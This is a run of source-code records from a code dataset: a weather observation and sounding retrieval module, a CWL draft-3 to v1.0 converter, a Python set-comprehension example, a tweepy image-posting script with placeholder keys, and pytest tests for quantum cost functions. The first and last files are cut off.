use_nan_sounding=False, use_existing=True, save=True):\n \"\"\"\n Retrieves upper-air data and interpolates to pressure levels. 
If use_nan_sounding is True, then if a retrieval\n error occurs, a blank sounding will be returned instead of an error.\n :param config:\n :param station_id: station ID of surface station used\n :param sounding_station_id: station ID of sounding station to use\n :param date: datetime\n :param use_nan_sounding: bool: if True, use sounding of NaNs instead of raising an error\n :param use_existing: bool: preferentially use existing soundings in sounding_data_dir\n :param save: bool: if True, save processed soundings to sounding_data_dir\n :return:\n \"\"\"\n variables = ['height', 'temperature', 'dewpoint', 'u_wind', 'v_wind']\n \n # Define levels for interpolation: same as model data, except omitting lowest_p_level\n plevs = [600, 750, 850, 925]\n pres_interp = np.array([p for p in plevs if p <= config['lowest_p_level']])\n \n # Try retrieving the sounding, first checking for existing\n if config['verbose']:\n print('upper_air: retrieving sounding for %s' % datetime.strftime(date, '%Y%m%d%H'))\n nan_sounding = False\n retrieve_sounding = False\n sndg_data_dir = config['Obs']['sounding_data_dir']\n if not(os.path.isdir(sndg_data_dir)):\n os.makedirs(sndg_data_dir)\n sndg_file = '%s/%s_SNDG_%s.pkl' % (sndg_data_dir, station_id, datetime.strftime(date, '%Y%m%d%H'))\n if use_existing:\n try:\n data = read_pkl(sndg_file)\n if config['verbose']:\n print(' Read from file.')\n except:\n retrieve_sounding = True\n else:\n retrieve_sounding = True\n if retrieve_sounding:\n try:\n dset = WyomingUpperAir.request_data(date, config['Obs']['sounding_station_id'])\n except:\n # Try again\n try:\n dset = WyomingUpperAir.request_data(date, config['Obs']['sounding_station_id'])\n except:\n if use_nan_sounding:\n if config['verbose']:\n print('upper_air: warning: unable to retrieve sounding; using nan.')\n nan_sounding = True\n else:\n raise ValueError('error retrieving sounding for %s' % date)\n \n # Retrieve pressure for interpolation to fixed levels\n if not nan_sounding:\n pressure = dset.variables['pressure']\n pres = np.array([p.magnitude for p in list(pressure)]) # units are hPa\n \n # Get variables and interpolate; add to dictionary\n data = OrderedDict()\n for var in variables:\n if not nan_sounding:\n var_data = dset.variables[var]\n var_array = np.array([v.magnitude for v in list(var_data)])\n var_interp = interp(pres_interp, pres, var_array)\n data[var] = var_interp.tolist()\n else:\n data[var] = [np.nan] * len(pres_interp)\n \n # Save\n if save and not nan_sounding:\n with open(sndg_file, 'wb') as handle:\n pickle.dump(data, handle, protocol=2)\n\n return data\n\ndef get_obs_hourly(config, station_id, api_dates, vars_api, units):\n \"\"\"\n Retrieve hourly obs data in a pd dataframe. 
In order to ensure that there is no missing hourly indices, use\n dataframe.reindex on each retrieved dataframe.\n :param station_id: station ID to obtain data from\n :param api_dates: dates from generate_dates\n :param vars_api: str: string formatted for api call var parameter\n :param units: str: string formatted for api call units parameter\n :return: pd.DataFrame: formatted hourly obs DataFrame\n \"\"\"\n # Initialize Meso\n m = Meso(token=config['meso_token'])\n if config['verbose']:\n print('get_obs_hourly: MesoPy initialized for station %s' % station_id)\n\n # Retrieve data\n obs_final = pd.DataFrame()\n for api_date in api_dates:\n if config['verbose']:\n print('get_obs_hourly: retrieving data from %s to %s' % api_date)\n obs = m.timeseries(stid=station_id, start=api_date[0], end=api_date[1], vars=vars_api, units=units,\n hfmetars='0')\n obspd = pd.DataFrame.from_dict(obs['STATION'][0]['OBSERVATIONS'])\n\n # Rename columns to requested vars\n obs_var_names = obs['STATION'][0]['SENSOR_VARIABLES']\n obs_var_keys = list(obs_var_names.keys())\n col_names = list(map(''.join, obspd.columns.values))\n for c in range(len(col_names)):\n col = col_names[c]\n for k in range(len(obs_var_keys)):\n key = obs_var_keys[k]\n if col == list(obs_var_names[key].keys())[0]:\n col_names[c] = key\n obspd.columns = col_names\n\n # Change datetime column to datetime object\n dateobj = pd.to_datetime(obspd['date_time'])\n obspd['date_time'] = dateobj\n datename = 'date_time'\n obspd = obspd.rename(columns={'date_time': datename})\n\n # Reformat data into hourly obs\n # Find mode of minute data: where the hourly metars are\n if config['verbose']:\n print('get_obs_hourly: finding METAR observation times...')\n minutes = []\n for row in obspd.iterrows():\n date = row[1][datename]\n minutes.append(date.minute)\n minute_count = np.bincount(np.array(minutes))\n rev_count = minute_count[::-1]\n minute_mode = minute_count.size - rev_count.argmax() - 1\n\n if config['verbose']:\n print('get_obs_hourly: finding hourly data...')\n obs_hourly = obspd[pd.DatetimeIndex(obspd[datename]).minute == minute_mode]\n obs_hourly.date_time = pd.to_datetime(obs_hourly[datename].values)\n obs_hourly = obs_hourly.set_index(datename)\n if 'precip_accum_one_hour' in vars_api:\n # May not have precip if none is recorded\n try:\n obs_hourly['precip_accum_one_hour'].fillna(0.0, inplace=True)\n except KeyError:\n obs_hourly['precip_accum_one_hour'] = 0.0\n\n # Need to reorder the column names\n obs_hourly.sort_index(axis=1, inplace=True)\n\n # Remove any duplicate rows\n obs_hourly = obs_hourly[~obs_hourly.index.duplicated(keep='last')]\n\n # Re-index by hourly. 
Fills missing with NaNs.\n expected_start = datetime.strptime(api_date[0], '%Y%m%d%H%M').replace(minute=minute_mode)\n expected_end = datetime.strptime(api_date[1], '%Y%m%d%H%M')\n expected_times = pd.date_range(expected_start, expected_end, freq='H').to_pydatetime()\n obs_hourly = obs_hourly.reindex(expected_times)\n var_list = vars_api.split(',')\n obs_final = pd.concat((obs_final, obs_hourly))\n\n # Remove any duplicate rows from concatenation\n obs_final = obs_final[~obs_final.index.duplicated(keep='last')]\n\n return obs_final\n\n\ndef reindex_hourly(df, start, end, interval, end_23z=False, use_rain_max=False):\n\n def last(values):\n return values.iloc[-1]\n\n if end_23z:\n new_end = pd.Timestamp(end.to_pydatetime() - timedelta(hours=1))\n else:\n new_end = end\n period = pd.date_range(start, end, freq='%dH' % interval)\n\n # Create a column with the new index an ob falls into\n if type(df.index.values[0]) == np.int64: #observations from csv file\n df.date_time=np.array([datetime.strptime(date, '%Y-%m-%d %H:%M:%S') for date in df['date_time'].values],dtype='datetime64[s]')\n df.set_index('date_time',inplace=True)\n df['period'] = (df.index.values > period.values[..., np.newaxis]).sum(0)\n df['DateTime'] = df.index.values\n aggregate = OrderedDict()\n col_names = df.columns.values\n for col in col_names:\n if not(col.lower().startswith('precip')) and not(col.lower().startswith('rain')):\n aggregate[col] = last\n else:\n if use_rain_max:\n aggregate[col] = np.max\n else:\n aggregate[col] = np.sum\n df_reindex = df.loc[start:new_end].groupby('period').agg(aggregate)\n try:\n df_reindex = df_reindex.drop('period', axis=1)\n except (ValueError, KeyError):\n pass\n df_reindex = df_reindex.set_index('DateTime')\n return df_reindex\n\n\ndef obs(config, output_files=None, csv_files=None, num_hours=24, interval=3,use_nan_sounding=False, use_existing_sounding=True):\n \"\"\"\n Generates observation data from MesoWest and UCAR soundings and saves to a file, which can later be retrieved for\n either training data or model run data.\n :param config:\n :param output_files: str: output file path if just one station, or list of output file paths if multiple stations\n :param csv_files: str: path to csv file containing observations if just one station, or list of paths to csv files if multiple stations\n :param num_hours: int: number of hours to retrieve obs\n :param interval: int: retrieve obs every 'interval' hours\n :param use_nan_sounding: bool: if True, uses a sounding of NaNs rather than omitting a day if sounding is missing\n :param use_existing_sounding: bool: if True, preferentially uses saved soundings in sounding_data_dir\n :return:\n \"\"\"\n if config['multi_stations']: #Train on multiple stations\n station_ids = config['station_id']\n if len(station_ids) != len(output_files): #There has to be the same number of output files as station IDs, so raise error if not\n raise ValueError(\"There must be the same number of output files as station IDs\")\n if len(station_ids) != len(csv_files): #There has to be the same number of output files as station IDs, so raise error if not\n raise ValueError(\"There must be the same number of csv files as station IDs\")\n else:\n station_ids = [config['station_id']]\n if output_files is not None:\n output_files = [output_files]\n if csv_files is not None:\n csv_files = [csv_files]\n \n for i in range(len(station_ids)):\n station_id = station_ids[i]\n if output_files is None:\n output_file = '%s/%s_obs.pkl' % (config['SITE_ROOT'], station_id)\n else:\n 
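# use the caller-supplied per-station output path
 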
output_file = output_files[i]\n \n if csv_files is None:\n csv_file = '%s/%s_obs.csv' % (config['SITE_ROOT'], station_id)\n else:\n csv_file = csv_files[i]\n \n start_date = datetime.strptime(config['data_start_date'], '%Y%m%d') - timedelta(hours=num_hours)\n dates = generate_dates(config)\n api_dates = generate_dates(config, api=True, start_date=start_date)\n\n \n # Retrieve station data\n if not os.path.exists(csv_file): #no observations saved yet\n # Look for desired variables\n vars_request = []\n vars = ['air_temp', 'altimeter', 'precip_accum_one_hour', 'relative_humidity','wind_speed', 'wind_direction','air_temp_low_6_hour', 'air_temp_high_6_hour', 'precip_accum_six_hour']\n m = Meso(token=config['meso_token'])\n if config['verbose']:\n print('obs: MesoPy initialized for station %s' % config['station_id'])\n print('obs: retrieving latest obs and metadata')\n latest = m.latest(stid=station_id)\n obs_list = list(latest['STATION'][0]['SENSOR_VARIABLES'].keys())\n # Add variables to the api request if they exist\n if config['verbose']:\n print('obs: searching for 6-hourly variables...')\n for var in vars:\n if var in obs_list:\n if config['verbose']:\n print('obs: found variable %s, adding to data' % var)\n vars_request += [var]\n \n # Add variables to the api request\n vars_api = ''\n for var in vars_request:\n vars_api += var + ','\n vars_api = vars_api[:-1]\n \n # Units\n units = 'temp|f,precip|in,speed|kts'\n all_obs_hourly = get_obs_hourly(config, station_id, api_dates, vars_api, units)\n try:\n all_obs_hourly.to_csv(csv_file)\n if config['verbose']:\n print('obs: saving observations to csv file succeeded')\n except BaseException as e:\n if config['verbose']:\n print(\"obs: warning: '%s' while saving observations\" % str(e))\n if 'precip_accum_one_hour' in vars_request:\n obs_hourly = all_obs_hourly[['air_temp','altimeter','precip_accum_one_hour','relative_humidity','wind_speed','wind_direction']] #subset of data used as predictors\n else:\n obs_hourly = all_obs_hourly[['air_temp','altimeter','relative_humidity','wind_speed','wind_direction']] #subset of data used as predictors\n else:\n if config['verbose']:\n print('obs: obtaining observations from csv file') \n all_obs_hourly = pd.read_csv(csv_file)\n vars_request=['air_temp','altimeter','precip_accum_one_hour','relative_humidity','wind_speed', 'wind_direction']\n for var in vars_request[:]: #see if variable is available, and remove from vars_request list if not\n try:\n obs_hourly = all_obs_hourly[[var]]\n except KeyError: #no such variable, so remove from vars_request list \n vars_request.remove(var)\n obs_hourly = all_obs_hourly[['date_time']+vars_request] #subset of data used as predictors\n \n # Retrieve upper-air sounding data\n soundings = OrderedDict()\n if config['Obs']['use_soundings']:\n if config['verbose']:\n print('obs: retrieving upper-air sounding data')\n for date in dates:\n soundings[date] = OrderedDict()\n start_date = date - timedelta(days=1) # get the previous day's soundings\n for hour in [0, 12]:\n sounding_date = start_date + timedelta(hours=hour)\n try:\n sounding = upper_air(config, station_id, sounding_station_id, sounding_date, use_nan_sounding, use_existing=use_existing_sounding)\n soundings[date][sounding_date] = sounding\n except:\n print('obs: warning: problem retrieving soundings for %s' % datetime.strftime(date, '%Y%m%d'))\n soundings.pop(date)\n break\n \n # Create dictionary of days\n if config['verbose']:\n print('obs: converting to output dictionary')\n obs_export = OrderedDict({'SFC': 
OrderedDict(),\n 'SNDG': OrderedDict()})\n for date in dates:\n if config['Obs']['use_soundings'] and date not in soundings.keys():\n continue\n # Need to ensure we use the right intervals to have 22:5? Z obs\n start = pd.Timestamp(date - timedelta(hours=num_hours,minutes=-1))\n end = pd.Timestamp(date)\n obs_export['SFC'][date] = reindex_hourly(obs_hourly, start, end, interval,\n end_23z=True).to_dict(into=OrderedDict)\n if config['Obs']['use_soundings']:\n obs_export['SNDG'][date] = soundings[date]\n \n # Export final data\n if config['verbose']:\n print('obs: -> exporting to %s' % output_file)\n with open(output_file, 'wb') as handle:\n pickle.dump(obs_export, handle, protocol=2)\n\n return\n\ndef process(config, obs_list):\n \"\"\"\n Returns a numpy array of obs for use in mosx_predictors. The first dimension is date; all other dimensions are\n serialized.\n :param config:\n :param obs_list: list of dictionaries of processed obs data for the different stations\n :return:\n \"\"\"\n # Surface observations\n if config['verbose']:\n print('obs.process: processing array for obs data...')\n \n for i in range(len(obs_list)):\n obs = obs_list[i]\n try:\n sfc = obs['SFC']\n except KeyError:\n sfc = obs[b'SFC']\n num_days = len(sfc.keys())\n variables = sorted(sfc[list(sfc.keys())[0]].keys())\n sfc_array = get_array(sfc)\n sfc_array_r = np.reshape(sfc_array, (num_days, -1))\n\n # Sounding observations\n if config['Obs']['use_soundings']:\n try:\n sndg_array = get_array(obs['SNDG'])\n except KeyError:\n sndg_array = get_array(obs[b'SNDG'])\n # num_days should be the same first dimension\n sndg_array_r = np.reshape(sndg_array, (num_days, -1))\n obs_one_array = np.hstack((sfc_array_r, sndg_array_r))\n if i == 0: #first station\n obs_array = obs_one_array\n else:\n obs_array = np.hstack((obs_array,obs_one_array))\n else:\n if i == 0: #first station\n obs_array = sfc_array_r\n else:\n obs_array = np.hstack((obs_array,sfc_array_r))\n return obs_array\n","sub_path":"mosx/obs/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":17750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"591666180","text":"#!/usr/bin/env python\n\"\"\"Transforms draft-3 CWL documents into v1.0 as idiomatically as possible.\"\"\"\n\nfrom __future__ import print_function\nfrom collections import Mapping, MutableMapping, Sequence\nimport sys\nimport copy\nfrom typing import (Any, Dict, List, Optional, # pylint:disable=unused-import\n Text, Union)\nimport ruamel.yaml\nfrom ruamel.yaml.comments import CommentedMap # for consistent sort order\n\ndef main(args=None): # type: (Optional[List[str]]) -> int\n \"\"\"Main function.\"\"\"\n if not args:\n args = sys.argv[1:]\n assert args is not None\n for path in args:\n with open(path) as entry:\n document = ruamel.yaml.safe_load(entry)\n if ('cwlVersion' in document\n and (document['cwlVersion'] == 'cwl:draft-3'\n or document['cwlVersion'] == 'draft-3')):\n document = draft3_to_v1_0(document)\n else:\n print(\"Skipping non draft-3 CWL document\", file=sys.stderr)\n print(ruamel.yaml.round_trip_dump(\n document, default_flow_style=False))\n return 0\n\n\ndef draft3_to_v1_0(document): # type: (Dict[Text, Any]) -> Dict\n \"\"\"Transformation loop.\"\"\"\n _draft3_to_v1_0(document)\n if isinstance(document, MutableMapping):\n for key, value in document.items():\n if isinstance(value, MutableMapping):\n document[key] = _draft3_to_v1_0(value)\n elif isinstance(value, list):\n for index, entry in enumerate(value):\n 
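# recurse into any mappings nested inside list values\n                    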
if isinstance(entry, MutableMapping):\n value[index] = _draft3_to_v1_0(entry)\n document['cwlVersion'] = 'v1.0'\n return sort_v1_0(document)\n\n\ndef _draft3_to_v1_0(document):\n # type: (MutableMapping[Text, Any]) -> MutableMapping[Text, Any]\n \"\"\"Inner loop for transforming draft-3 to v1.0.\"\"\"\n if \"class\" in document:\n if document[\"class\"] == \"Workflow\":\n workflow_clean(document)\n elif document[\"class\"] == \"File\":\n document[\"location\"] = document.pop(\"path\")\n elif document[\"class\"] == \"CommandLineTool\":\n input_output_clean(document)\n hints_and_requirements_clean(document)\n if isinstance(document[\"baseCommand\"], list) and \\\n len(document[\"baseCommand\"]) == 1:\n document[\"baseCommand\"] = document[\"baseCommand\"][0]\n if \"arguments\" in document and not document[\"arguments\"]:\n del document[\"arguments\"]\n clean_secondary_files(document)\n\n if \"description\" in document:\n document[\"doc\"] = document.pop(\"description\")\n\n return document\n\n\ndef workflow_clean(document): # type: (MutableMapping[Text, Any]) -> None\n \"\"\"Transform draft-3 style Workflows to more idiomatic v1.0\"\"\"\n input_output_clean(document)\n hints_and_requirements_clean(document)\n outputs = document['outputs']\n for output_id in outputs:\n outputs[output_id][\"outputSource\"] = \\\n outputs[output_id].pop(\"source\").lstrip('#').replace(\".\", \"/\")\n new_steps = CommentedMap()\n for step in document[\"steps\"]:\n new_step = CommentedMap()\n new_step.update(step)\n step = new_step\n step_id = step.pop(\"id\")\n step_id_len = len(step_id)+1\n step[\"out\"] = []\n for outp in step[\"outputs\"]:\n clean_outp_id = outp[\"id\"]\n if clean_outp_id.startswith(step_id):\n clean_outp_id = clean_outp_id[step_id_len:]\n step[\"out\"].append(clean_outp_id)\n del step[\"outputs\"]\n ins = CommentedMap()\n for inp in step[\"inputs\"]:\n ident = inp[\"id\"]\n if ident.startswith(step_id):\n ident = ident[step_id_len:]\n if 'source' in inp:\n inp[\"source\"] = inp[\"source\"].lstrip('#').replace(\".\", \"/\")\n del inp[\"id\"]\n if len(inp) > 1:\n ins[ident] = inp\n elif len(inp) == 1:\n if \"source\" in inp:\n ins[ident] = inp.popitem()[1]\n else:\n ins[ident] = inp\n else:\n ins[ident] = {}\n step[\"in\"] = ins\n del step[\"inputs\"]\n if \"scatter\" in step:\n if isinstance(step[\"scatter\"], (str, Text)) == 1:\n source = step[\"scatter\"]\n if source.startswith(step_id):\n source = source[step_id_len:]\n step[\"scatter\"] = source\n elif isinstance(step[\"scatter\"], list) and len(step[\"scatter\"]) > 1:\n step[\"scatter\"] = []\n for source in step[\"scatter\"]:\n if source.startswith(step_id):\n source = source[step_id_len:]\n step[\"scatter\"].append(source)\n else:\n source = step[\"scatter\"][0]\n if source.startswith(step_id):\n source = source[step_id_len:]\n step[\"scatter\"] = source\n if \"description\" in step:\n step[\"doc\"] = step.pop(\"description\")\n new_steps[step_id.lstrip('#')] = step\n document[\"steps\"] = new_steps\n\n\ndef input_output_clean(document): # type: (MutableMapping[Text, Any]) -> None\n \"\"\"Transform draft-3 style input/output listings into idiomatic v1.0.\"\"\"\n for param_type in ['inputs', 'outputs']:\n if param_type not in document:\n break\n new_section = CommentedMap()\n for param in document[param_type]:\n param_id = param.pop('id').lstrip('#')\n if 'type' in param:\n param['type'] = shorten_type(param['type'])\n if 'description' in param:\n param['doc'] = param.pop('description')\n if len(param) > 1:\n new_section[param_id] = 
sort_input_or_output(param)\n            else:\n                new_section[param_id] = param.popitem()[1]\n        document[param_type] = new_section\n\n\ndef hints_and_requirements_clean(document):\n    # type: (MutableMapping[Text, Any]) -> None\n    \"\"\"Transform draft-3 style hints/reqs into idiomatic v1.0 hints/reqs.\"\"\"\n    for section in ['hints', 'requirements']:\n        if section in document:\n            new_section = {}\n            for entry in document[section]:\n                if entry[\"class\"] == \"CreateFileRequirement\":\n                    entry[\"class\"] = \"InitialWorkDirRequirement\"\n                    entry[\"listing\"] = []\n                    for filedef in entry[\"fileDef\"]:\n                        entry[\"listing\"].append({\n                            \"entryname\": filedef[\"filename\"],\n                            \"entry\": filedef[\"fileContent\"]\n                        })\n                    del entry[\"fileDef\"]\n                new_section[entry[\"class\"]] = entry\n                del entry[\"class\"]\n            document[section] = new_section\n\n\ndef shorten_type(type_obj): # type: (List[Any]) -> Union[Text, List[Any]]\n    \"\"\"Transform draft-3 style type declarations into idiomatic v1.0 types.\"\"\"\n    if isinstance(type_obj, (str, Text)) or not isinstance(type_obj, Sequence):\n        return type_obj\n    new_type = []\n    for entry in type_obj: # find arrays that we can shorten and do so\n        if isinstance(entry, Mapping):\n            if (entry['type'] == 'array' and\n                    isinstance(entry['items'], (str, Text))):\n                entry = entry['items'] + '[]'\n            elif entry['type'] == 'enum':\n                entry = sort_enum(entry)\n        new_type.extend([entry])\n    if len(new_type) == 2:\n        if 'null' in new_type:\n            type_copy = copy.deepcopy(new_type)\n            type_copy.remove('null')\n            if isinstance(type_copy[0], (str, Text)):\n                return type_copy[0] + '?'\n    if len(new_type) == 1:\n        return new_type[0]\n    return new_type\n\n\ndef clean_secondary_files(document):\n    # type: (MutableMapping[Text, Any]) -> None\n    \"\"\"Cleanup for secondaryFiles\"\"\"\n    if \"secondaryFiles\" in document:\n        for i, sfile in enumerate(document[\"secondaryFiles\"]):\n            if \"$(\" in sfile or \"${\" in sfile:\n                document[\"secondaryFiles\"][i] = sfile.replace(\n                    '\"path\"', '\"location\"').replace(\".path\", \".location\")\n\n\ndef sort_v1_0(document): # type: (Dict) -> Dict\n    \"\"\"Sort the sections of the CWL document in a more meaningful order.\"\"\"\n    keyorder = ['cwlVersion', 'class', 'id', 'label', 'doc', 'requirements',\n                'hints', 'inputs', 'stdin', 'baseCommand', 'steps',\n                'expression', 'arguments', 'stderr', 'stdout', 'outputs',\n                'successCodes', 'temporaryFailCodes', 'permanentFailCodes']\n    return CommentedMap(\n        sorted(document.items(), key=lambda i: keyorder.index(i[0])\n               if i[0] in keyorder else 100))\n\n\ndef sort_enum(enum): # type: (Mapping) -> Dict\n    \"\"\"Sort the enum type definitions in a more meaningful order.\"\"\"\n    keyorder = ['type', 'name', 'label', 'symbols', 'inputBinding']\n    return CommentedMap(\n        sorted(enum.items(), key=lambda i: keyorder.index(i[0])\n               if i[0] in keyorder else 100))\n\n\ndef sort_input_or_output(io_def): # type: (Dict) -> Dict\n    \"\"\"Sort the input definitions in a more meaningful order.\"\"\"\n    keyorder = ['label', 'doc', 'type', 'format', 'secondaryFiles',\n                'default', 'inputBinding', 'outputBinding', 'streamable']\n    return CommentedMap(\n        sorted(io_def.items(), key=lambda i: keyorder.index(i[0])\n               if i[0] in keyorder else 100))\n\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n","sub_path":"cwlupgrader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"374092197","text":"\n\"\"\"\nThe input sequence (inputlist) is a list that contains duplicate numbers.\nBecause the resulting set does not allow duplicates, the duplicated values are removed naturally.\nSince a set does not guarantee element order, the printed result may appear in a randomly changed order.\n\"\"\"\n\ninputlist = [1, 1, 1, 2, 3, 3, 4]\n \nnewlist = {i*i for i in inputlist}\n \nprint(newlist)\n# {16, 1, 4, 9}","sub_path":"PythonMain/src/ch09-collection/ch-SetComprehension/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"584503365","text":"import tweepy\nimport sys\n\nconsumer_key = 'XXXX'\nconsumer_secret = 'XXXX'\naccess_token = 'XXXX'\naccess_token_secret = 'XXXX'\n\ndef upload_media(url,status_val):\n    auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n    auth.set_access_token(access_token, access_token_secret)\n    api = tweepy.API(auth)\n    # api.update_status('hi')\n    media = api.media_upload(url)\n    # print(media)\n    post_result = api.update_status(status=status_val, media_ids=[media.media_id])\n    print(\"success!!\")\n    return '0'","sub_path":"TwitterBot.py","file_name":"TwitterBot.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"49475863","text":"from functools import partial\nfrom unittest import mock\n\nimport numpy as np\nimport pytest\nfrom openfermion import QubitOperator\nfrom sympy import Symbol\nfrom zquantum.core.cost_function import (\n    AnsatzBasedCostFunction,\n    get_ground_state_cost_function,\n    sum_expectation_values,\n)\nfrom zquantum.core.estimation import (\n    allocate_shots_proportionally,\n    allocate_shots_uniformly,\n    calculate_exact_expectation_values,\n    estimate_expectation_values_by_averaging,\n)\nfrom zquantum.core.interfaces.mock_objects import MockAnsatz\nfrom zquantum.core.measurement import ExpectationValues\nfrom zquantum.core.symbolic_simulator import SymbolicSimulator\nfrom zquantum.core.utils import create_symbols_map\n\nRNGSEED = 1234\n\n\n@pytest.fixture(\n    params=[\n        {\n            \"target_operator\": QubitOperator(\"Z0\"),\n            \"parametrized_circuit\": MockAnsatz(\n                number_of_layers=1, problem_size=1\n            ).parametrized_circuit,\n            \"backend\": SymbolicSimulator(),\n            \"estimation_method\": estimate_expectation_values_by_averaging,\n            \"estimation_preprocessors\": [\n                partial(allocate_shots_uniformly, number_of_shots=1)\n            ],\n        },\n        {\n            \"target_operator\": QubitOperator(\"Z0 Z1\"),\n            \"parametrized_circuit\": MockAnsatz(\n                number_of_layers=1, problem_size=2\n            ).parametrized_circuit,\n            \"backend\": SymbolicSimulator(),\n            \"estimation_method\": estimate_expectation_values_by_averaging,\n            \"estimation_preprocessors\": [\n                partial(allocate_shots_uniformly, number_of_shots=1)\n            ],\n        },\n        {\n            \"target_operator\": QubitOperator(\"Z0 Z1\"),\n            \"parametrized_circuit\": MockAnsatz(\n                number_of_layers=2, problem_size=2\n            ).parametrized_circuit,\n            \"backend\": SymbolicSimulator(),\n            \"estimation_method\": estimate_expectation_values_by_averaging,\n            \"fixed_parameters\": [1.2],\n            \"estimation_preprocessors\": [\n                partial(allocate_shots_uniformly, number_of_shots=1)\n            ],\n        },\n        {\n            \"target_operator\": QubitOperator(\"Z0 Z1\"),\n            \"parametrized_circuit\": MockAnsatz(\n                number_of_layers=2, problem_size=2\n            ).parametrized_circuit,\n            \"backend\": SymbolicSimulator(),\n            \"estimation_method\": estimate_expectation_values_by_averaging,\n            \"fixed_parameters\": [1.2],\n            \"parameter_precision\": 0.001,\n            \"parameter_precision_seed\": RNGSEED,\n            \"estimation_preprocessors\": [\n                partial(allocate_shots_uniformly, number_of_shots=1)\n            ],\n        },\n        {\n            \"target_operator\": 
QubitOperator(\"Z0\"),\n            \"parametrized_circuit\": MockAnsatz(\n                number_of_layers=1, problem_size=1\n            ).parametrized_circuit,\n            \"backend\": SymbolicSimulator(),\n            \"estimation_method\": estimate_expectation_values_by_averaging,\n            \"estimation_preprocessors\": [\n                partial(allocate_shots_proportionally, total_n_shots=1)\n            ],\n        },\n    ]\n)\ndef ground_state_cost_function(request):\n    return get_ground_state_cost_function(**request.param)\n\n\ndef test_ground_state_cost_function_returns_value_between_plus_and_minus_one(\n    ground_state_cost_function,\n):\n    params = np.array([1.0], dtype=float)\n    value = ground_state_cost_function(params)\n    assert -1 <= value <= 1\n\n\ndef test_noisy_ground_state_cost_function_adds_noise_to_parameters():\n    target_operator = QubitOperator(\"Z0\")\n    parametrized_circuit = MockAnsatz(\n        number_of_layers=2, problem_size=1\n    ).parametrized_circuit\n    parametrized_circuit.bind = mock.Mock(wraps=parametrized_circuit.bind)\n    backend = SymbolicSimulator()\n    estimation_method = estimate_expectation_values_by_averaging\n    estimation_preprocessors = [partial(allocate_shots_uniformly, number_of_shots=1)]\n    noisy_ground_state_cost_function = get_ground_state_cost_function(\n        target_operator,\n        parametrized_circuit,\n        backend,\n        estimation_method=estimation_method,\n        estimation_preprocessors=estimation_preprocessors,\n        parameter_precision=1e-4,\n        parameter_precision_seed=RNGSEED,\n    )\n\n    generator = np.random.default_rng(RNGSEED)\n\n    # We expect the below to get added to parameters\n    noise = generator.normal(0, 1e-4, 2)\n\n    params = np.array([0.1, 2.3], dtype=float)\n\n    expected_symbols_map = {\n        Symbol(\"theta_0\"): noise[0] + params[0],\n        Symbol(\"theta_1\"): noise[1] + params[1],\n    }\n\n    # ansatz based cost function may modify params in place\n    # and we need original ones - therefore we pass a copy\n    noisy_ground_state_cost_function(np.array(params))\n\n    # We only called our function once, therefore the following should be true\n    parametrized_circuit.bind.assert_called_with(expected_symbols_map)\n\n    # and if everything went right, this single call should be of the form\n    # noisy_ansatz.ansatz.get_executable_circuit(params+noise)\n    # Therefore, we extract the single argument and compare it to the\n    # expected one.\n    assert np.array_equal(\n        parametrized_circuit.bind.call_args[0][0], expected_symbols_map\n    )\n\n    # Note: normally, we would just do it in a single assert:\n    # noisy_ansatz.ansatz.get_executable_circuit.assert_called_once_with(params_noise)\n    # However, this does not work with numpy arrays, as it uses == operator\n    # to compare arguments, which does not produce a boolean value for numpy arrays\n\n\ndef test_sum_expectation_values():\n    expectation_values = ExpectationValues(np.array([5, -2, 1]))\n    total = sum_expectation_values(expectation_values)\n    assert np.isclose(total.value, 4)\n    assert total.precision is None\n\n\ndef test_sum_expectation_values_with_covariances():\n    values = np.array([5, -2, 1])\n    correlations = [np.array([[1, 0.5], [0.5, 2]]), np.array([[7]])]\n    covariances = [correlations[0] / 10, correlations[1] / 10]\n    expectation_values = ExpectationValues(values, correlations, covariances)\n    total = sum_expectation_values(expectation_values)\n    assert np.isclose(total.value, 4)\n    assert np.isclose(total.precision, np.sqrt((1 + 0.5 + 0.5 + 2 + 7) / 10))\n\n\n@pytest.fixture\ndef ansatz_based_cost_function():\n    target_operator = QubitOperator(\"Z0\")\n    ansatz = MockAnsatz(number_of_layers=1, problem_size=1)\n    backend = SymbolicSimulator()\n    
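# the averaging estimator with one uniform shot per term keeps the fixture\n    # fast; partial(allocate_shots_proportionally, total_n_shots=1), as in the\n    # last parametrized case above, would divide a total shot budget instead\n    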
estimation_method = estimate_expectation_values_by_averaging\n    estimation_preprocessors = [partial(allocate_shots_uniformly, number_of_shots=1)]\n    return AnsatzBasedCostFunction(\n        target_operator,\n        ansatz,\n        backend,\n        estimation_method=estimation_method,\n        estimation_preprocessors=estimation_preprocessors,\n    )\n\n\ndef test_ansatz_based_cost_function_returns_value_between_plus_and_minus_one(\n    ansatz_based_cost_function,\n):\n    params = np.array([1])\n    value = ansatz_based_cost_function(params)\n    assert -1 <= value <= 1\n\n\n@pytest.fixture\ndef noisy_ansatz_cost_function_with_ansatz():\n    target_operator = QubitOperator(\"Z0\")\n    ansatz = MockAnsatz(number_of_layers=2, problem_size=1)\n    backend = SymbolicSimulator()\n    estimation_method = mock.Mock(wraps=calculate_exact_expectation_values)\n    return (\n        AnsatzBasedCostFunction(\n            target_operator,\n            ansatz,\n            backend,\n            estimation_method=estimation_method,\n            parameter_precision=1e-4,\n            parameter_precision_seed=RNGSEED,\n        ),\n        ansatz,\n    )\n\n\ndef test_ansatz_based_cost_function_adds_noise_to_parameters(\n    noisy_ansatz_cost_function_with_ansatz,\n):\n    noisy_ansatz_cost_function = noisy_ansatz_cost_function_with_ansatz[0]\n    ansatz = noisy_ansatz_cost_function_with_ansatz[1]\n    generator = np.random.default_rng(RNGSEED)\n\n    # We expect the below to get added to parameters\n    noise = generator.normal(0, 1e-4, 2)\n\n    params = np.array([0.1, 2.3])\n\n    # ansatz based cost function may modify params in place\n    # and we need original ones - therefore we pass a copy\n    noisy_ansatz_cost_function(np.array(params))\n\n    # We only called our function once, 